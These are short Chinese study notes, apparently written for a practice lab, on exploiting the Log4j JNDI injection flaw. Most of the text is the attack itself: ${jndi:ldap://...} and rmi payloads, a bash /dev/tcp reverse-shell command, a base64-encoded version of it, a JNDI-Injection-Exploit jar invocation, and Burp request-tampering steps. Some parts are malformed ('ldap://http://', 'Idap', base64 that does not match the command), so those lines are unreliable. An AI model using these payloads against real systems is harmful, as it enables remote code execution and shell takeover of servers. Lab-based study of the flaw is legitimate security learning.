log4j是一个记录日志的组件,用来对程序状态进行动态记录,
logger.info("system propety: ${jndi:schema://url}");
jndi:jndi解析器通过jdk获取内容,反序列化为java对象作为jndi,
并打印,jndi就是这个从外部查找得到的java对象。
schema:获取方式,jdk支持多种不同的查找方式,包括
corbname, dns, iiop, iiopname, ldap, ldaps, rmi
因ldap写法简单,被作为常用的获取方式
jndi:ldap://http://w932vw.dnslog.cn
?${jndi:ldap://http://w932vw.dnslog.cn}
过程:解析器通过jdk向w932vw.dnslog.cn这个域名发起请求,域名服务器做出回应后,
下载一段字节流,将其反序列化并作为jndi返回,反序列化过程中,会执行字节流中所包含的程序。
复现过程:
新建监听
jndi开启服务
bash -i >& /dev/tcp/xx.xx.xx.xx/1234 0>&1
进行base64编码:
java.lang.Runtime.exec() Payload Workarounds - @Jackson_T
编码后:
bash -c {echo,YmFzaCAta3RjcC8zOS4xMDYuNDUuMjA2LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}
执行命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZG8zOS4xMDYuNDUuMjA2LzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}" -A xx.xx.xx.xx
构造burp的payload
payload=${jndi:rmi://xx.xx.xx.xx/u0dilf}
burp改包
反弹shell
NSlog获取域名--->靶场刷新抓包--->改包头改为hello,改为get包,添加payload=${jndi:Idap://o42y25.dnslog.cn}---->查看DNSlog数据IP已被带出
新建监听bash -i >& /dev/tcp/xx.xx.xx.xx/1234 0>&1(反弹shell命令)--->将此命令进行编码---->用工具执行命令(jndi注入jar)---->复制弹出的命令并在burp改包输入payload=${jndi:}